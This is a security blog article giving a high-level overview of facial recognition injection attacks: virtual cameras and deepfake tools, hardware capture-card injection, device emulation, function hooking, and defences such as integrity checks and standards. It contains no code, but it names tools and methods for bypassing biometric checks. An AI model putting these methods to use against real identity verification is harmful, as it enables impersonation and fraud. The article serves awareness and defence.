Facial Recognition Injection Attacks - An Overview

Facial Recognition Injection Attacks

An Overview

Yann Santschi
by Yann Santschi
on March 18, 2025
time to read: 10 minutes

Keypoints

Facial Recognition Injection Attacks also known as Video Injection Attacks are getting more and more popular. This article showcases different types of attacks and prevention methods.

  • Facial Recognition Injection Attacks involve injecting tampered video feeds or deepfakes into facial recognition systems to bypass security
  • Current attack types include Virtual Video Injections, Hardware-based Video Injections, Device Emulation and Function Hooking
  • Preventing these attacks requires a multi-layered defense, including device integrity checks, anti-spoofing software, and awareness of attack methods
  • Liveness detection and video stream integrity checks are important for detecting tampered video, though these attacks are difficult to fully prevent

Presumably, most people have encountered facial recognition software, particularly as an authentication method that verifies identity through something you are. However, the camera or video streams used by these systems can be manipulated or injected with fraudulent content, often leveraging advanced Deepfake technologies or physical disguises to deceive biometric security measures.

Introduction

ENISA describes in their publication, ID Proofing Good Practices, that facial recognition injection attacks occur five times more frequently than presentation attacks. Particularly, video injection attacks leverage deepfake technologies have gained prominence among criminals and nation-state actors.

This article provides a high-level overview of how facial recognition injection attacks operate, alongside recommended practices to secure system interfaces against these sophisticated threats. It was developed in collaboration with Mobai, a Norwegian start-up specializing in biometric facial recognition technology, where the author completed an internship.

Facial recognition is widely utilized as an authentication factor by verifying identity through biometric attributes—often termed something you are. Attacks on facial recognition systems generally fall into two categories: Presentation attacks and injection attacks. Presentation attacks involve presenting deceptive materials, known as Presentation Attack Instruments (PAIs), such as photographs or 3D masks, to fool biometric sensors.

In contrast, facial recognition injection attacks, or video injection attacks, involve inserting manipulated videos or images directly into the camera stream using Injection Attack Instruments (IAIs). Attackers intercept or alter the camera feed, replacing it with fabricated content like images, pre-recorded videos, or deepfakes.

Deepfakes are not a focus for this article, but Andrea Hauser has written many great articles about them:

Attack Vectors

ENISA utilizes the following illustration to showcase where a fraudulent video is injected when attacking a facial recognition system. This is where the video feed is intercepted and a tampered-with video is injected.

ENISA RIDP Good Practices, Where video injection attacks happen in biometric proofing systems

Virtual Video Injections

The simplest attack form is using a virtual camera on the device. A virtual camera, as shown later, primarily serves as a method to inject manipulated videos into video streams. Such attacks can be executed on both mobile phones and mobile devices. Popular software solutions providing virtual camera capabilities include OBS and ManyCam. These tools are extensively used in live streaming or video conferencing to overlay content onto video feeds. Executing this type of attack is as straightforward as selecting the virtual camera input in applications such as Zoom and then choosing the desired manipulated media. A practical demonstration using OBS can be viewed in the following video by GuideRealm.

Specialized real-time face-swapping or deepfake software solutions exists, and is used in combination with virtual camera software as mentioned above. Notable open-source projects providing such capabilities are Deep-Live-Cam, DeepFaceLive and Avatarify Python – although DeepFaceLive was archived on November 13th 2024. For in-depth demonstrations, refer to different videos. A recommendation is the German video by AlexiBexi explaining Deep-Live-Cam in great detail.

Hardware-Based Video Injections

Hardware-based video injections represent another approach, similar in concept to virtual camera injections but utilizing physical hardware devices to inject tampered video or image streams. Typically, this involves using external adapters such as video capture cards, which accept input via HDMI and interface with client devices as camera inputs. These adapters commonly connect through USB-C ports, although direct camera input adapters are also viable but require specialized connections. Implementing hardware injections, especially on mobile devices, often involves physically removing or replacing internal cameras. Guides provided by resources like iFixit offer detailed teardown instructions for various devices. Mobile devices frequently utilize interfaces like the MIPI Camera Serial Interface (CSI-2) connected via flat flex cable (FPC) connectors. While CSI-to-HDMI adapters, particularly those designed for Raspberry Pi systems, exist, compatibility is not universal due to variations in pin layouts, connector types, and voltage levels. A documented proof-of-concept was achieved and shown by FaceTec in their NIST FRVT-PAD Commentary of 2022. Although the referenced demonstration channel has since been removed by YouTube. Rooting mobile devices may be necessary to facilitate the required modifications. Alternatively, a Raspberry Pi running LineageOS, an open-source Android distribution, can serve as an effective platform for testing facial recognition applications and attacks, particularly due to its native support for CSI-to-HDMI adapters.

Device Emulation

Device emulation attacks leverage virtual environments to intercept and manipulate camera-related system calls. Rather than interfacing with physical hardware, these calls are redirected to virtual cameras and sensors provided by the emulator. The virtual operating system executes these system calls, allowing the injection of fabricated video streams without modifying physical hardware.

Function Hooking

Function hooking is a sophisticated method that directly intercepts and modifies the facial recognition application’s system calls on the actual device. Unlike device emulation, function hooking involves altering function calls in real-time during video capture in a debugging state. Attackers can achieve this by replacing the function, that is called for capturing the video stream, and replacing it with the tampered video stream.

Implementing function hooking requires advanced technical capabilities, including root access, reverse-engineering (decompilation), detailed knowledge of system call mechanisms, and the ability to craft malicious functions. Due to its complexity and dependency on specific technologies and applications, function hooking attacks are highly specialized and customized for each targeted scenario.

Preventing and Detecting Facial Recognition Injection Attacks

Contrary to Presentation Attack Instruments (PAIs), Injection Attack Instruments (IAIs) cannot be fully detected using traditional methods such as liveness detection_. Typically, liveness detection mechanisms rely on various factors, including motion analysis, 3D depth sensing, and the evaluation of light reflections and shadows. Detecting or preventing IAIs poses significant challenges because these attacks involve compromised devices under an attacker’s control.

In live video scenarios, such as online job interviews, IAIs become particularly difficult to identify, as detection heavily relies on the awareness of the interviewers or other participants. This vulnerability has been notably exploited in incidents involving live-deepfake attacks, exemplified by cases documented by North Korean APT groups. One well-documented example is described in the article KnowBe4 Interviews a Fake North Korean Employee.

Effective detection strategies against IAIs extend beyond user awareness. These methods include integrity checks at the device, camera, and video stream levels. Integrity verification examines hardware authenticity, software legitimacy, and driver conformity against established baselines and known secure configurations. Furthermore, anti-spoofing software and advanced algorithms play a critical role in facial recognition systems to mitigate such attacks.

Finally, from a organizational and technical perspective the standard CEN/TS 18099:2025 provides comprehensive guidelines and insights into managing biometric security threats. Additionally, the International Organization for Standardization (ISO) is developing a standard under the working title NP 25456, Information technology — Biometrics — Biometric data injection attack detection. which aims to establish standardized practices for identifying and mitigating biometric injection attacks effectively.

Conclusion

Facial recognition systems are becoming crucial for security and authentication. However, the cleverness and maturity of such attacks are increasing steadily. Facial recognition injection attacks pose significant threats by bypassing traditional security methods. These attacks use tools like deepfakes, virtual cameras, and hardware devices to manipulate video streams, making detection difficult.

To mitigate these threats, a multi-layered defense approach is necessary. Integrating device integrity checks, anti-spoofing software, and secure system interfaces is essential. Awareness of attack methods, like virtual camera manipulation and deepfake injection, is critical for protecting biometric systems.

About the Author

Yann Santschi

Yann Santschi completed an apprenticeship as a systems engineer at the Swiss Stock Exchange and then worked as a cyber security consultant at one of the Big Four consulting firms. He is currently pursuing his Bachelor’s degree in Information and Cyber Security with a major in Attack Specialist and Penetration Testing at HSLU. His focus is on web applications, network security, and social engineering.

Links

You want experience what damage AI and Fake News can do?

Our experts will get in contact with you!

×
Darknet

Darknet

We are going to help to deal wich your data leaks emerging in the Darknet.

You want more?

Further articles available here

How I started my InfoSec Journey

How I started my InfoSec Journey

Yann Santschi

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here